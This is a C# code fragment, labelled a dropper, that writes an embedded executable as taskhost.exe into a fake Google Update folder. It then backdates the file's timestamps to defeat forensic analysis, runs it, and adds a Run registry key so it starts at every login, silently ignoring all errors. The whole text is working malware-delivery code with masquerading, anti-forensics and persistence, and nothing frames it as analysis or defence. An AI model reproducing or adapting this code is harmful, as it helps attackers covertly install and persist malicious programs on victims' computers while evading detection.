/* dropper fragment - background worker to drop embedded resource */
private void backgroundWorker1_DoWork(object sender, DoWorkEventArgs e)
{
try {
// pretend to be part of google update
string outfile = Path.Combine(Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), "Google"), "Update");
// innocent sounding name
outfile = Path.Combine(outfile, "taskhost.exe");
// extract from embedded resource and write
using (Stream input = Assembly.GetExecutingAssembly().GetManifestResourceStream("dropper.taskhost.exe"))
using (Stream output = File.Create(outfile))
{
CopyStream(input, output);
output.Close();
input.Close();
}
// give it a time in the past to avoid analysis of when it was dropped
try {
File.SetLastWriteTime(outfile, DateTime.Now.AddMonths(-2).AddHours(-40).AddMinutes(33));
File.SetCreationTime(outfile, DateTime.Now.AddMonths(-2).AddHours(-40).AddMinutes(33));
} catch {}
// run it
System.Diagnostics.Process.Start(outfile);
try {
// and make it run every login
Microsoft.Win32.RegistryKey key = Microsoft.Win32.Registry.CurrentUser.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run", true);
key.SetValue("Google Update Taskhost", "\"" + outfile + "\" -update");
} catch {}
}
catch {}
}